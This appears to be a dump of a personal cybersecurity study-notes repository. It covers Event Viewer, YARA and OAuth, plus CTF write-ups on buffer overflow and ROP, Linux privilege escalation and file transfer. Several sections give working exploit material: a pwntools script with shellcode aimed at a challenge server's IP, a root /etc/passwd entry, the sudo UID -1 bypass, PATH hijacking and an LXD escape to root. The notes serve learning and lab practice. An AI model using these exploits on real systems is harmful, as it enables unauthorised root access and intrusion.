on windows button and click on Event Viewer or by writting `eventvwr.msc` in cmd.exe 25 | 26 | It has 3 panes 27 | 1. Left one provides a tree lsiting the event log providers 28 | 2. Middle one displays a general overview and summary or the events specific to the selct provider. 29 | 3. Right is the actions one. 30 | 31 | There are 5 types of events that can be logged : 32 | 33 | **Error** 34 | An event that indicates a significant problem such as loss of data or loss of functionality. For example, if a service fails to load during startup, an Error event is logged. 35 | 36 | **Warning** 37 | An event that is not necessarily significant, but may indicate a possible future problem. For example, when disk space is low, a Warning event is logged. If an application can recover from an event without loss of functionality or data, it can generally classify the event as a Warning event. 38 | 39 | **Information** 40 | An event that describes the successful operation of an application, driver, or service. For example, when a network driver loads successfully, it may be appropriate to log an Information event. Note that it is generally inappropriate for a desktop application to log an event each time it starts. 41 | 42 | **Success Audit** 43 | An event that records an audited security access attempt that is successful. For example, a user's successful attempt to log on to the system is logged as a Success Audit event. 44 | 45 | **Failure Audit** 46 | An event that records an audited security access attempt that fails. For example, if a user tries to access a network drive and fails, the attempt is logged as a Failure Audit event. 47 | 48 | Source : https://docs.microsoft.com/en-us/windows/win32/eventlog/event-types 49 | 50 | In the left pane the standard logs are visible under Windows Logs , Here is a description for each : 51 | 52 | **Application** 53 | Contains events logged by applications. For example, a database application might record a file error. The application developer decides which events to record. 54 | 55 | **Security** 56 | Contains events such as valid and invalid logon attempts, as well as events related to resource use such as creating, opening, or deleting files or other objects. An administrator can start auditing to record events in the security log. 57 | 58 | **System** 59 | Contains events logged by system components, such as the failure of a driver or other system component to load during startup. 60 | 61 | **CustomLog** 62 | Contains events logged by applications that create a custom log. Using a custom log enables an application to control the size of the log or attach ACLs for security purposes without affecting other applications. 63 | 64 | PowerShell will log operations from the engine, providers, and cmdlets to the Windows event log. -------------------------------------------------------------------------------- /Day 14 - Yara/README.md: -------------------------------------------------------------------------------- 1 | ### YARA 2 | Main Resource Used : https://tryhackme.com/room/yara 3 | 4 | ###### Introduction 5 | 6 | This fullform of YARA is Yet Another Ridiculous Acronym and its considered to be the pattern matching swiss knife for everyone. 7 | 8 | It can identify info based on both binaru and text patterns such as hexadecomal and strings in a file. 9 | 10 | To define these patterns we use Rules, these rules are often written to determine if a file is malicious or not. 11 | 12 | Strings are fundamental component of programing langugaes, applications use strings to store data such as text. We can use Yara to search those strings in every program running in the OS. 13 | 14 | Malwares use strings to store textual data, like IP addresses or bitcoin addresses. 15 | 16 | ###### Downloading Yara 17 | 18 | 1. Apt-get installing it : `sudo apt install yara` 19 | 2. Installing from source : `sudo apt install automake libtool make gcc flex bison libssl-dev libjansson-dev libmagic-dev pkg-config` 20 | 3. Manually via the Github repo : `wget https://github.com/VirusTotal/yara/archive/v4.0.2.tar.gz` and then follow the steps there. 21 | 22 | ###### Rules in Yara 23 | 24 | The language used is preety basic in Yara and they are written in .yar extension files, The strenth of rules is basically determined by the patterns used to search for. 25 | Yara command requires 2 arguements to be valid : 26 | 1. The rule file 27 | 2. Name of file, directory, or process ID to apply the rule. 28 | 29 | To make this rule files we can start the file with 30 | ``` 31 | rule examplerule { 32 |         condition: true 33 | } 34 | ``` 35 | The name in this case would be examplerule and the condition is condition. Every Rule requires a name and a condition to be valid. 36 | 37 | This here checks if the files exist , if the file doesnt exist we get errors. And to run these rules we use yara like this : 38 | ``` 39 | yara rule.yar filethattotallyexists 40 | ``` 41 | A lot of the conditions in Yara are documented here : 42 | https://yara.readthedocs.io/en/stable/writingrules.html 43 | 44 | A few of them are : 45 | 46 | Meta : This is for descriptive information by the author of the rule. Like you can use desc to summarise what your rule checks for. Its basically like comments. 47 | 48 | Strings : They can be used to search for specific text or hexadecimal in files or programs. If we wanted to know if the file contains a certain strings lets say we can use Yara rules. 49 | 50 | We can define it like this : 51 | ``` 52 | rule string_checker { 53 | strings: 54 | $bitcoing_address = "Somerandomaddress" 55 | $MaliciousIP = "SomeguysIPs" 56 | 57 | condition: 58 | any of them 59 | } 60 | ``` 61 | 62 | This rule will try to search all these strings in the files/paths we define. 63 | 64 | So for the conditions we can also use stuff like Operators <= , >= , != etc. 65 | For example to use these operators with strings : 66 | ``` 67 | rule string_checker { 68 | strings: 69 | $bitcoing_address = "Somerandomaddress" 70 | $MaliciousIP = "SomeguysIPs" 71 | 72 | condition: 73 | $MaliciousIP <= 10 74 | } 75 | ``` 76 | 77 | So now it will match only if there are less then 10 or 10 occurances of the the Malicious IP , We also have other operators like and,not,or . Example 78 | ``` 79 | rule string_checker { 80 | strings: 81 | $bitcoing_address = "Somerandomaddress" 82 | $txt_file = ".txt" 83 | 84 | condition: 85 | $bitcoing_address and $txt_file 86 | } 87 | ``` 88 | This rule will now only match with files that have the bitcoin address and have the .txt extension. 89 | 90 | Super Handy Cheatsheet : https://medium.com/malware-buddy/security-infographics-9c4d3bd891ef#18dd 91 | 92 | ###### Modules 93 | We can use the modules to improve technicality of your yara rules. 94 | Cuckoo : Automated Malware analysis enviornment, allows to generate yara rules on behaviours discovered in its sandbox. 95 | 96 | Python PE : This module allows to create rules from various secitons/ elements of Windows Portable Executable System. 97 | 98 | ###### Loki 99 | This tool helps us to make many rules without building them from scratch. 100 | 101 | Quite a lot of other tools can be found here : 102 | https://github.com/InQuest/awesome-yara 103 | 104 | This is basically a free Indicator of Compromise scanner. It can be used on Windows and Linux systems. 105 | 106 | Many times you gotta research about the latest exploits and then use that information to create exploits, Loki already has a lot of rules that we can benefit from in scanning for evil on the endpoint security. We can use -p to define the path of the files we want Loki to scan. 107 | 108 | ``` 109 | python loki.py -p /path/tocheck 110 | ``` 111 | 112 | ###### Thor Lite 113 | This is a newer version of the tool and a multi platform IOC and Yara Scanner, It has scan throttling to limit exhausting CPU resources. 114 | 115 | Some other tools are : Fenrir , YAYA (yet another yara automation) 116 | 117 | 118 | ###### Creating Yara Rules with yarGen 119 | 120 | The main principle is the creation of yara rules from strings found in malware files while removing all strings that also appear in goodware files. Therefore yarGen includes a big goodware strings and opcode database as ZIP archives that have to be extracted before the first use. 121 | -------------------------------------------------------------------------------- /Day 15 - ROP Attacks Basics/Images/functions.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 15 - ROP Attacks Basics/Images/functions.png -------------------------------------------------------------------------------- /Day 15 - ROP Attacks Basics/Images/overwritten.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 15 - ROP Attacks Basics/Images/overwritten.png -------------------------------------------------------------------------------- /Day 15 - ROP Attacks Basics/Images/patternsearch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 15 - ROP Attacks Basics/Images/patternsearch.png -------------------------------------------------------------------------------- /Day 15 - ROP Attacks Basics/Images/reg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 15 - ROP Attacks Basics/Images/reg.png -------------------------------------------------------------------------------- /Day 15 - ROP Attacks Basics/Images/run.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 15 - ROP Attacks Basics/Images/run.png -------------------------------------------------------------------------------- /Day 15 - ROP Attacks Basics/Images/winner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 15 - ROP Attacks Basics/Images/winner.png -------------------------------------------------------------------------------- /Day 15 - ROP Attacks Basics/README.md: -------------------------------------------------------------------------------- 1 | Main resources used : https://www.youtube.com/watch?v=72GShSHsRZI : Pink Draconian : Hack The Box - Introduction to Binary Exploitation - Reg - Walkthrough 2 | 3 | This is a exploitation technique used in Buffer Overflows and by malicious outsiders to execute code on target systems. 4 | 5 | 6 | This attack is basically mostly done when we have NX secuirty enabled due to which we wont be able to execute our shellcode soo we have to analyse the flow of the functions and basically return functions to our advantage to take control of functions in the binary to get us remote code execution.Ideally many times what we can do is abuse the libc library for this which is very well known and it is possible to identify memory addresses we can call to craft a payload that wont mess up the buffer and execute what we want it to. 7 | 8 | But in many CTF's we have functions we can take over functions that we can analyse with Ghidra/gdb to get information about addresses we can redirect our controlled EIP too , to get execute the Function. 9 | 10 | #### Example : Reg 11 | 12 | Here we can see this is a super simple CTF the first thing to do here would be to analyse the binary in gdb/ghidra . 13 | 14 | Here if we analyse the Binary in Ghidra we see that there is 4 functions : main, run,intialize winner . After analysing the code we can see the main fucntion runs the run function which is using initialize function to initializing variables and using gets function soo we can easily overwrite that as gets is vulnerable to Buffer Overflow attacks. 15 | 16 | ![](./Images/run.png) 17 | 18 | ![](./Images/winner.png) 19 | 20 | So lets try opening the file in gdb and analyse where the EIP is to do this we can use the pattern_create and pattern_search built into gdb-peda like so : 21 | 22 | ![](./Images/reg.png) 23 | 24 | ![](./Images/patternsearch.png) 25 | 26 | Also to confirm if the RIP address we got is correct we can try overwritting it and i did that by printing 56 "a" and added 4 b to overwrite the RIP and we were succesful . 27 | 28 | ![](./Images/overwritten.png) 29 | 30 | Now lets reload the file in gdb (helps avoid the extra functions added in the binary after execution) and do info functions to see where the address is for the Winner function which we have to execute to get our shell. 31 | 32 | ![](./Images/functions.png) 33 | 34 | and here now we see the address is `0x0000000000401206` but due to Little endian in our payload we gotta reverse it you can use libraries like pwntools, struct for it i just reversed it manually and our payload would be something like this : 35 | 36 | ```python 37 | padding = 56 * b"a" 38 | address = b"\x06\x12\x40\x00\x00\x00\x00\x00" 39 | payload = padding + address 40 | print(payload) 41 | ``` 42 | 43 | We can now transfer this output to a file and then send this to our netcat session like so . 44 | 45 | ```bash 46 | python exploit.py > payload.txt 47 | nc remoteip remoteport < payload.txt 48 | ``` -------------------------------------------------------------------------------- /Day 16 - OAuth Basics/README.md: -------------------------------------------------------------------------------- 1 | Main Resource Used : 2 | https://portswigger.net/web-security/oauth : Web Security Academy : OAuth Authentication 3 | https://www.youtube.com/watch?v=j-bHvqQ378s :Understanding How OAuth2 Works : Engineer Man 4 | 5 | OAuth is basically an algorithm that helps us access the users data from a website with a cool. Lets so for example we have our website A and we want people to login without having them to make an account we can use OAuth and ask data from an Oauth provider like Discord lets say. We can specify yhe specific data we want from them and then the user would just have authorize if they allow access for our website A to access that specific bit of data. So in simpler terms OAuth allows the user to grant this access without exposing their login credentials to the requesting application. 6 | 7 | Many times sites use this along with Social media websites to let you log in using them. This is super popular now , but it does have a lot of implementation mistakes. 8 | 9 | OAuth allows web developers to also request access to certain data to integrate 3rd Party functionality. It works via defining a series of interactions b/w 3 distinct parties ,namely client, resource owner and OAuth service Provider. There are a lot of diffrent ways this can be implmented as well. The most popular types of it are "authorization code" and "implicit" : 10 | The main steps for it are : 11 | 1. Client app requests access to the specified data , after telling which grant type they want to use. 12 | 2. User will then be prompted to give their consent 13 | 3. The client recieves a unique access token that proves they have permission to view the users data. 14 | 4. The client application can then just use this token to make API calls and fetch the needed data from resource server. 15 | 16 | OAuth Authentication : 17 | 18 | This was not intended before but now its very popular for websites to use OAuth to help authenticate users. 19 | 20 | The basic OAuth flows remain alrgely the same for this , the main diffrence would be how the cleint applications uses the data it gets. From the user side, the user OAuth auth is something similar to SSO. 21 | 22 | Generally used like : 23 | 1. User chooses to option login with the OAuth Provider, the client application then uses the Oauth provider to access to some data that it can use to idenitfy the user. Could be emails, username,etc. 24 | 2. The application can then use access token to access the information from OAuth Service Provider API endpoints. 25 | 3. After having the Token, the applicaiton uses it in place of username , email to log the user in and the access token that it gets is often used instead of traditional password. 26 | 27 | Vulnerabilites in this arise due to : 28 | 29 | 1. Due to the Data Specification in OAuth being vague and flexible. 30 | 2. Plenty of opportunties for Bad practices to creep in 31 | 3. Lack of Built-in Security features. It relies mostly on developers and also extra security features needing to be implemented. 32 | 4. Depending on the type of data being transfered it could be higly sensitive at times, and could be intercepted at times. -------------------------------------------------------------------------------- /Day 17 - Linux Privelege Escalation/README.md: -------------------------------------------------------------------------------- 1 | Main Resources used : https://tryhackme.com/room/commonlinuxprivesc 2 | 3 | Privilege Escalation usually involves going from a lower permission to a higher permission. 4 | 5 | This is where you expand your reach over the compromised system by taking over a different user who is on the same privilege level as you. This is where you attempt to gain higher privileges or access, with an existing account that you have already compromised. For local privilege escalation attacks this might mean hijacking an account with administrator privileges or root privileges. 6 | 7 | This allow you to do many things, including: 8 | 9 | - Reset passwords 10 | - Bypass access controls to compromise protected data 11 | - Edit software configurations 12 | - Enable persistence, so you can access the machine again later. 13 | - Change privilege of users 14 | 15 | So the two main sources to get the information are these ones here - 16 | 17 | LinEnum is a simple bash script that performs common commands related to privilege escalation, saving time and allowing more effort to be put toward getting root. It is important to understand what commands LinEnum executes, so that you are able to manually enumerate privesc vulnerabilities in a situation where you're unable to use LinEnum or other like script 18 | 19 | [LinEnum.sh](http://LinEnum.sh) 20 | 21 | [](https://netsec.ws/?p=309)[https://netsec.ws/?p=309](https://netsec.ws/?p=309) 22 | 23 | [](https://github.com/rebootuser/LinEnum)[https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum) 24 | 25 | [](https://null-byte.wonderhowto.com/how-to/use-linenum-identify-potential-privilege-escalation-vectors-0197225/)[https://null-byte.wonderhowto.com/how-to/use-linenum-identify-potential-privilege-escalation-vectors-0197225/](https://null-byte.wonderhowto.com/how-to/use-linenum-identify-potential-privilege-escalation-vectors-0197225/) 26 | 27 | [](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)[https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) 28 | 29 | If its running with high privelage with another account or something instead of root you have to do 30 | 31 | ```bash 32 | sudo -u user binaryhecanrunasadmin exploitfrogtfo 33 | ``` 34 | 35 | ### Set SUID/GUID Privellages → 36 | 37 | This means that the file or files can be run with the permissions of the file(s) owner/group. In this case, as the super-user. We can leverage this to get a shell with these privileges! 38 | 39 | As we all know in Linux everything is a file, including directories and devices which have permissions to allow or restrict three operations i.e. read/write/execute. So when you set permission for any file, you should be aware of the Linux users to whom you allow or restrict all three permissions. 40 | 41 | Take a look at the following demonstration of how maximum privileges (rwx-rwx-rwx) look: 42 | 43 | r = read 44 | 45 | w = write 46 | 47 | x = execute 48 | 49 | **user** **group** **others** 50 | 51 | rwx rwx rwx 52 | 53 | 421 421 421 54 | 55 | The maximum number of bit that can be used to set permission for each user is 7, which is a combination of read (4) write (2) and execute (1) operation. For example, if you set permissions using **"chmod"** as **755**, then it will be: rwxr-xr-x. 56 | 57 | But when special permission is given to each user it becomes SUID \*\*\*\*or SGID. When extra bit **“4”** is set to user(Owner) it becomes **SUID** (Set user ID) and when bit **“2”** is set to group it becomes **SGID** (Set Group ID). 58 | 59 | Therefore, the permissions to look for when looking for SUID is: 60 | 61 | SUID: 62 | 63 | rws-rwx-rwx 64 | 65 | GUID: 66 | 67 | rwx-rws-rwx 68 | 69 | ```bash 70 | **find / -perm -u=s -type f 2>/dev/null** 71 | ``` 72 | 73 | we can use the command: **"find / -perm -u=s -type f 2>/dev/null"** to search the file system for SUID/GUID files. Let's break down this command. 74 | 75 | **find** - Initiates the "find" command 76 | 77 | **/** - Searches the whole file system 78 | 79 | **\-perm** - searches for files with specific permissions 80 | 81 | **\-u=s** - Any of the permission bits _mode_ are set for the file. Symbolic modes are accepted in this form 82 | 83 | **\-type f** - Only search for files 84 | 85 | **2>/dev/null** - Suppresses errors 86 | 87 | ### Exploiting a Writeable /etc/passwd 88 | 89 | The /etc/passwd file stores essential information, which is required during login. In other words, it stores user account information. The /etc/passwd is a plain text file. It contains a list of the system’s accounts, giving for each account some useful information like user ID, group ID, home directory, shell, and more. 90 | 91 | The /etc/passwd file should have general read permission as many command utilities use it to map user IDs to user names. However, write access to the /etc/passwd must only limit for the superuser/root account. When it doesn't, or a user has erroneously been added to a write-allowed group. We have a vulnerability that can allow the creation of a root user that we can access. 92 | 93 | The /etc/passwd file contains one entry per line for each user (user account) of the system. All fields are separated by a colon : symbol. Total of seven fields as follows. 94 | 95 | Example : test:x:0:0:root:/root:/bin/bash 96 | 97 | 1. **Username**: It is used when user logs in. It should be between 1 and 32 characters in length. 98 | 2. **Password**: An x character indicates that encrypted password is stored in /etc/shadow file. Please note that you need to use the passwd command to computes the hash of a password typed at the CLI or to store/update the hash of the password in /etc/shadow file, in this case, the password hash is stored as an "x". 99 | 3. **User ID (UID)**: Each user must be assigned a user ID (UID). UID 0 (zero) is reserved for root and UIDs 1-99 are reserved for other predefined accounts. Further UID 100-999 are reserved by system for administrative and system accounts/groups. 100 | 4. **Group ID (GID)**: The primary group ID (stored in /etc/group file) 101 | 5. **User ID Info**: The comment field. It allow you to add extra information about the users such as user’s full name, phone number etc. This field use by finger command. 102 | 6. **Home directory**: The absolute path to the directory the user will be in when they log in. If this directory does not exists then users directory becomes / 103 | 7. **Command/shell**: The absolute path of a command or shell (/bin/bash). Typically, this is a shell. Please note that it does not have to be a shell. 104 | 105 | Now that we know this and we have a writable /etc/passwd file we can write a new line entry according to above formula and create a new user . We add the password hash of our choice and set the UID .GID and shell to roo. Allowing us to log in as our own root user. 106 | 107 | Before we add our new user, we first need to create a compliant password hash to add! We do this by using the command: 108 | 109 | ```bash 110 | openssl passwd -1 -salt [salt] [password] 111 | ``` 112 | 113 | And now we can edit the etc/passwd file and add either a new password to root or just include the a new user to the bottom like this 114 | 115 | ```bash 116 | new:$1$1$uDhz6SV7D5d03OFB20h4E//G0:0:0:root:/root:/bin/bash 117 | ``` 118 | 119 | ### Escaping Vi Editor 120 | 121 | This exploit comes down to how effective our user account enumeration has been. Every time you have access to an account during a CTF scenario, you should use "sudo -l" to list what commands you're able to use as a super user on that account. Sometimes, like this, you'll find that you're able to run certain commands as a root user without the root password. This can enable you to escalate privileges. 122 | 123 | If you find a misconfigured binary during your enumeration, or when you check what binaries a user account you have access to can access, a good place to look up how to exploit them is GTFOBins. GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. It provides a really useful breakdown of how to exploit a misconfigured binary and is the first place you should look if you find one on a CTF or Pentest. 124 | 125 | If we have something like /usr/bin/vi we can abuse it by using sudo vi and then we write :!sh and we will get a shell. 126 | 127 | [](https://gtfobins.github.io/)[https://gtfobins.github.io/](https://gtfobins.github.io/) 128 | 129 | ### Exploiting Crontab 130 | 131 | The Cron daemon is a long-running process that executes commands at specific dates and times. You can use this to schedule activities, either as one-time events or as recurring tasks. You can create a crontab file containing commands and instructions for the Cron daemon to execute. 132 | 133 | We can use the command "cat /etc/crontab" to view what cron jobs are scheduled. This is something you should always check manually whenever you get a chance, especially if LinEnum, or a similar script, doesn't find anything. 134 | 135 | Cronjobs exist in a certain format, being able to read that format is important if you want to exploit a cron job. 136 | 137 | \= ID, m = Minute ,h = Hour ,dom = Day of the month ,mon = Month ,dow = Day of the week ,user = What user the command will run as, command = What command should be run 138 | 139 | If the auoscript is owned by root, meaning that it will run with root privileges, despite the fact that we can write to this file. The task th is to create a command that will return a shell and paste it in this file the autoscript file .Then we use nc -lvp 8888 for us to get a shell whenever the thing runs. 140 | 141 | ### Exploiting Path variable 142 | 143 | PATH is an environmental variable in Linux and Unix-like operating systems which specifies directories that hold executable programs. When the user run any command in the terminal, it searches for executable files with the help of the PATH Variable in response to commands executed by a user. 144 | 145 | Let's say we have an SUID binary. Running it, we can see that it’s calling the system shell to do a basic process like list processes with "ps". Unlike in our previous SUID example, in this situation we can't exploit it by supplying an argument for command injection, so what can we do to try and exploit this? 146 | 147 | We can re-write the PATH variable to a location of our choosing! So when the SUID binary calls the system shell to run an executable, it runs one that we've written instead! 148 | 149 | As with any SUID file, it will run this command with the same privileges as the owner of the SUID file! If this is root, using this method we can run whatever commands we like as root! 150 | 151 | let's change directory to "tmp" Now we're inside tmp, let's create an imitation executable. The format for what we want to do is: 152 | 153 | echo \["/bin/bash"\] > \[filewewannaimpersonate\] 154 | 155 | we then make this file executable and then we change the path variable to this 156 | 157 | export PATH=/tmp:$PATH 158 | 159 | ### Sudo Bypass 160 | 161 | CVE-2019-14287 is a vulnerability found in the Unix Sudo program by a researcher working for Apple: Joe Vennix. Coincidentally, he also found the vulnerability that we'll be covering in the next room of this series. This exploit has since been fixed, but may still be present in older versions of Sudo (versions < 1.8.28), so it's well worth keeping an eye out for! 162 | 163 | The vulnerability we're interested in for this task occurs in a very particular scenario. Say you have a user who you want to grant extra permissions to. You want to let this user execute a program as if they were any other user, but you don't want to let them execute it as root. You might add this line to the sudoers file: 164 | 165 | ```bash 166 | ALL=(ALL:!root) NOPASSWD: ALL 167 | ``` 168 | 169 | This would let your user execute any command as another user, but would (theoretically) prevent them from executing the command as the superuser/admin/root. In other words, you can pretend to be any user, except from the admin. 170 | 171 | In practice, with vulnerable versions of Sudo you can get around this restriction to execute the programs as root anyway, which is obviously great for privilege escalation! 172 | 173 | With the above configuration, using sudo -u#0 (the UID of root is always 0) would not work, as we're not allowed to execute commands as root. If we try to execute commands as user 0 we will be given an error. Enter CVE-2019-14287. 174 | 175 | Joe Vennix found that if you specify a UID of -1 (or its unsigned equivalent: 4294967295), Sudo would incorrectly read this as being 0 (i.e. root). This means that by specifying a UID of -1 or 4294967295, you can execute a command as root, despite being explicitly prevented from doing so. It is worth nothing that this will only work if you've been granted non-root sudo permissions for the command, as in the configuration above. 176 | 177 | Practically, the application of this is as follows: 178 | 179 | ```bash 180 | sudo -u#-1 181 | ``` 182 | 183 | If you have this (ALL : ALL) NOPASSWD: ALL just do sudo su to gain root and gg 184 | 185 | ### Netstat -tulpn 186 | 187 | Do this to check what port is running local and try to connect to it using telnet. 188 | 189 | [](https://www.hackingarticles.in/penetration-testing-on-memcached-server/)[https://www.hackingarticles.in/penetration-testing-on-memcached-server/](https://www.hackingarticles.in/penetration-testing-on-memcached-server/) 190 | 191 | ### Linking to a Folder gettinng chmod'ed 192 | 193 | Here sometimes there is a cron job that could be something like this 194 | 195 | ![https://s3-us-west-2.amazonaws.com/secure.notion-static.com/e1dd9514-5c93-41ab-aab8-cd27e33b6682/Untitled.png](https://s3-us-west-2.amazonaws.com/secure.notion-static.com/e1dd9514-5c93-41ab-aab8-cd27e33b6682/Untitled.png) 196 | 197 | So to exploit this if we have writable permission to the directory we can make a link to the root folder like so : 198 | 199 | ```bash 200 | ln -s /root ./tmp 201 | ``` 202 | 203 | ### LXD Exploitation : 204 | 205 | On the Attacker Machine : 206 | 207 | ```bash 208 | git clone  209 | cd lxd-alpine-builder 210 | ./build-alpine 211 | ``` 212 | 213 | then transfer the build file over to the Target machine you can use nc, python3 -m http.server or python -m SimpleHttpServer for this. 214 | 215 | Then traverse to the folder where you downloaded this alpine image, 216 | 217 | ```bash 218 | lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage 219 | ``` 220 | 221 | You are importing the image now as the myimage. 222 | 223 | ```bash 224 | lxc init myimage ignite -c security.privileged=true 225 | lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true 226 | lxc start ignite 227 | lxc exec ignite /bin/sh 228 | id 229 | mnt/root/root 230 | ls 231 | ``` -------------------------------------------------------------------------------- /Day 2 - More about Stacks and Linux BOF/Images/ghex.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 2 - More about Stacks and Linux BOF/Images/ghex.png -------------------------------------------------------------------------------- /Day 2 - More about Stacks and Linux BOF/Images/intialize.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 2 - More about Stacks and Linux BOF/Images/intialize.png -------------------------------------------------------------------------------- /Day 2 - More about Stacks and Linux BOF/Images/main.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nickapic/Cyber-Security-Knowledge/91f78514d5b122e769244bad2235808054b70acf/Day 2 - More about Stacks and Linux BOF/Images/main.png -------------------------------------------------------------------------------- /Day 2 - More about Stacks and Linux BOF/README.md: -------------------------------------------------------------------------------- 1 | ### Introduction to the Stack 2 | 3 | This is the area of memory within a process which is used by processes itself to save data. Contrary to registers which are small in size, the stack offers us a lot of space. This also helps to track the execution of the program. 4 | 5 | When a new function is called to know what place the execution stopped the last address before function call is stored on the stack. 6 | 7 | Which is the return address, as this where the program has to return. Stack is 4-byte aligned (32 bit) and it grows towards lower addresses. The stack starts with a high address and grows down to low memory addresses as values are added, the Base Pointer points to the beginning (base) of the stack in contrast to the Stack Pointer, which points to the top of the stack. 8 | 9 | If no protections are in place we just operate on these Stacks as a normal piece in memory, and if we can overwrite them due to programmatical errors we can cause a overflow. 10 | This mostly happens in C/C++ where you have predefine the size of the variable many time's. 11 | 12 | We can use gdb to analyze these attacks and the stack and the values of the registers when such attacks happen and disassemble functions to get an idea of what they are doing etc. 13 | 14 | ```bash 15 | gdb -q ./files 16 | disas main # to analyze the main functions and see which other functions are called and stuff and what they are doing 17 | ``` 18 | Basically what we are trying to first find vulnerable points and then send a lot of characters to overwrite the EIP(which is what controls the execution flow of the program) and if we can do that then we are good to go. 19 | 20 | And to get exact values of EIP we can use pattern_create and pattern_offset to create and get the values of these fields. 21 | 22 | ```bash 23 | gdb-peda$ pattern_create 1000 # Creates a cyclic pattern and then you can use pattern_offset to basically check the crash 24 | gdb-peda$ pattern_offset 0x4e734138 # This tells us to the offset 25 | ``` 26 | 27 | Also some necessary things to check before hand : 28 | 29 | Check what Endian is being used and to this we can do readelf or file on the binary we have and we will see if its LSB (Least Significant Bit, Little Endian) or MSB (Most Significant Bit, big Endian) 30 | and then check for security on the binary and what we have permissions to do like is NX enabled which if enabled we cannot use shellcode and execute from the stacks and what stuff would we have to bypass like ASLR and stuff. 31 | -------------------------------------------------------------------------------- /Day 2 - More about Stacks and Linux BOF/optimistic.md: -------------------------------------------------------------------------------- 1 | ### Optimistic : HTB Challenges : Pwn 2 | 3 | ``` 4 | Refrences Used : PinkDraconian Video about this topic : https://www.youtube.com/watch?v=MVeRz2ZdSdk 5 | ``` 6 | Here lets first try to analyze the security features and architecture of the binary. 7 | 8 | ```bash 9 | $ checksec optimistic 10 | Arch: amd64-64-little 11 | RELRO: Partial RELRO 12 | Stack: No canary found 13 | NX: NX disabled 14 | PIE: PIE enabled 15 | RWX: Has RWX segments 16 | ``` 17 | 18 | ```bash 19 | $ file optimistic 20 | optimistic: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=24f4b065a2eab20657772e85de2af83b2f6fe8b1, for GNU/Linux 3.2.0, not stripped 21 | ``` 22 | Now lets analyze the binary in Ghidra and as this binary is not striped we can see function names and symbols loading it into Ghidra we see there are two made functions here : 23 | 24 | ![Ghidra Main Function](main.png) 25 | 26 | ![Ghidra Initialize Function](intialize.png) 27 | 28 | and in the initialize function we have an alarm function which alarms us after 30 seconds and stops binary but for making our payload we can try patching this function to get the alarm after 255 seconds to give us a lot of time to work with. 29 | 30 | By analyzing the main function in Ghidra we can see that its giving us a Stack address when we press y . and we can see that we are getting the Base Pointer address AND ALSO FURTHER analyzing the binary we see that there is unsigned integer value initialized which is then casted into an integer and compared to the bytes and due to how unsigned and signed integers work we get an integer buffer overflow if we replace that unsigned integer value as -1 which is not in the scope of an unsigned integer and goes to the max value in the unsigned integer which then when casted into integers would convert back to -1 as 255 bytes which is the most for an unsigned integer does not exist in signed integers causing this issue and allowing us to basically conduct or do a stack overflow here. 31 | 32 | 33 | ```python 34 | from pwn import * 35 | 36 | def main(): 37 | context(os='linux', arch='amd64') 38 | # io = process('./optimistic_patched') 39 | io = remote('139.59.169.46', 30872) 40 | # First Step is to ennumerate 41 | padding = 104 42 | stack_offset = -96 43 | # get stack address 44 | 45 | io.sendlineafter(': ', 'y') 46 | stack_address = io.recvline().decode().strip().split()[-1][2:] 47 | stack_address = bytes.fromhex(stack_address).rjust(8, b'\x00') 48 | stack_address = u64(stack_address, endian='big') # To make it easier to work with it with addition to the address and so on 49 | stack_address += stack_offset 50 | log.success(f'Gottem: {p64(stack_address)}' ) 51 | 52 | # Stack Address calculation : 53 | # We leaked a stack address but we wanna know its location in relation to the Buffer where we can overflow how many bytes is its difference 54 | # We would have to jump back 96 bytes to get back to stack as char local_68 in main function is 96 and we gotta jump back to behind that and start of stack 55 | 56 | # Step 2 : Do Buffer Overflow 57 | io.sendlineafter('Email: ', 'ab') 58 | io.sendlineafter('Age: ', 'ab') 59 | io.sendlineafter('Length of name: ', '-1') 60 | # Alpha Numeric Characters are only allowed in this shellcode 61 | shellcode = b"XXj0TYX45Pk13VX40473At1At1qu1qv1qwHcyt14yH34yhj5XVX1FK1FSH3FOPTj0X40PP4u4NZ4jWSEW18EF0V" 62 | padding = b'a'* (padding - len(shellcode)) 63 | payload = shellcode + padding + p64(stack_address) 64 | io.sendlineafter('Name: ', payload) 65 | io.interactive() 66 | 67 | main() 68 | ``` 69 | -------------------------------------------------------------------------------- /Day 20- File Transfers/README.md: -------------------------------------------------------------------------------- 1 | # File Transfers 2 | So what is post exploitation this when we basically consisits of stuff like File transfers, port forwarding, pivoting, maintaining access, Clean up etc. 3 | 4 | So to do fle transfers we we will use tools like certutil,ftp,browser,FTP, wget 5 | 6 | ### File Transfers / Certutil.exe → 7 | 8 | Http Server hosting with Python : 9 | 10 | ```bash 11 | python -m SimpleHTTPServer 80 12 | ``` 13 | 14 | Getting the file on the Winndows machine using certutil 15 | 16 | ```bash 17 | certutil.exe -urlcache -f link filename 18 | ``` 19 | 20 | ### 